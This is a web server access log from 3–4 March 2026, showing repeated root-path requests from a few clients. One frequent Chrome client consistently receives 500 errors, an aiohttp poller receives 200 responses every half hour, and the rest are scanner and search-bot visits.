65.108.120.157 - - [03/Mar/2026:00:37:58 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:00:45:30 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:00:56:20 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:01:03:08 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:01:15:28 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:01:21:21 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:01:27:59 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:01:45:29 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:01:46:25 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:01:52:57 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:02:11:20 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:02:15:29 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:02:17:59 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:02:36:24 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:02:43:02 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
134.209.100.43 - - [03/Mar/2026:02:44:17 +1000] "GET / HTTP/1.1" 500 1076962 "-" "python-requests/2.31.0"
118.127.40.73 - - [03/Mar/2026:02:45:27 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:03:01:22 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:03:06:33 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:03:11:02 +1000] "GET / HTTP/1.1" 500 1077602 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:03:15:28 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:03:16:18 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:03:34:40 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:03:41:17 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:03:45:36 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:03:59:39 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:04:15:47 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
193.149.189.234 - - [03/Mar/2026:04:28:02 +1000] "GET / HTTP/1.1" 500 1076964 "-" "python-requests/2.32.4"
103.21.64.3 - - [03/Mar/2026:04:34:58 +1000] "GET / HTTP/1.1" 500 1077356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:04:45:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
118.127.40.73 - - [03/Mar/2026:05:15:29 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
118.127.40.73 - - [03/Mar/2026:05:45:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
204.76.203.25 - - [03/Mar/2026:05:55:39 +1000] "GET / HTTP/1.1" 200 4230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3"
118.127.40.73 - - [03/Mar/2026:06:15:29 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
118.127.40.73 - - [03/Mar/2026:06:45:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
118.127.40.73 - - [03/Mar/2026:07:15:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
180.245.205.73 - - [03/Mar/2026:07:39:41 +1000] "HEAD / HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.9 Mobile/15E148 Safari/604.1"
180.245.205.73 - - [03/Mar/2026:07:41:04 +1000] "GET / HTTP/1.1" 500 1077384 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.4 Safari/605.1.15"
180.245.205.73 - - [03/Mar/2026:07:41:22 +1000] "GET / HTTP/1.1" 500 1077300 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:07:45:35 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
118.127.40.73 - - [03/Mar/2026:08:15:42 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
118.127.40.73 - - [03/Mar/2026:08:45:33 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
74.7.175.146 - - [03/Mar/2026:08:55:08 +1000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
118.127.40.73 - - [03/Mar/2026:09:15:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
118.127.40.73 - - [03/Mar/2026:09:45:36 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
147.185.132.52 - - [03/Mar/2026:10:04:32 +1000] "GET / HTTP/1.1" 500 1077304 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
118.127.40.73 - - [03/Mar/2026:10:15:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:10:33:50 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:10:38:16 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:10:40:46 +1000] "GET / HTTP/1.1" 500 1077600 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:10:45:07 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:10:45:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:10:52:16 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:10:57:21 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:11:01:44 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:11:15:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:11:27:31 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:11:45:37 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:12:03:55 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
18.206.217.244 - - [03/Mar/2026:12:12:45 +1000] "GET / HTTP/1.1" 200 4230 "-" "python-requests/2.32.4"
118.127.40.73 - - [03/Mar/2026:12:15:38 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:12:30:04 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:12:45:41 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:13:05:37 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:13:15:38 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:13:31:20 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:13:46:06 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:14:07:19 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:14:15:37 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:14:32:54 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:14:45:39 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:15:08:25 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:15:14:06 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:15:15:36 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:15:18:35 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:15:44:10 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:15:45:37 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
118.127.40.73 - - [03/Mar/2026:16:15:36 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:16:20:20 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:16:45:44 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:16:46:58 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
74.7.175.177 - - [03/Mar/2026:17:15:23 +1000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
118.127.40.73 - - [03/Mar/2026:17:15:38 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:17:22:34 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:17:45:24 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:17:45:38 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:17:52:21 +1000] "GET / HTTP/1.1" 500 1077508 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:17:56:47 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:18:11:49 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:18:14:31 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:18:15:37 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:18:18:56 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:18:19:11 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:18:37:46 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:18:44:22 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:18:45:40 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
74.7.241.173 - - [03/Mar/2026:18:55:22 +1000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
65.108.120.157 - - [03/Mar/2026:19:02:43 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:19:09:21 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:19:15:39 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:19:27:41 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:19:34:18 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:19:45:40 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:19:52:42 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:19:59:18 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:20:15:38 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:20:17:45 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:20:24:19 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:20:42:44 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:20:45:42 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:20:49:18 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:21:07:41 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:21:14:19 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:21:15:39 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:21:32:47 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:21:39:20 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:21:45:38 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:21:57:44 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:22:04:20 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:22:15:49 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:22:22:45 +1000] "GET / HTTP/1.1" 500 1077602 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:22:29:19 +1000] "GET / HTTP/1.1" 500 1077602 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:22:31:15 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:22:35:33 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:22:37:34 +1000] "GET / HTTP/1.1" 500 1077602 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:22:45:42 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:22:56:05 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:23:02:42 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:23:16:10 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:23:21:07 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:23:27:46 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:23:46:06 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:23:52:42 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:00:11:05 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
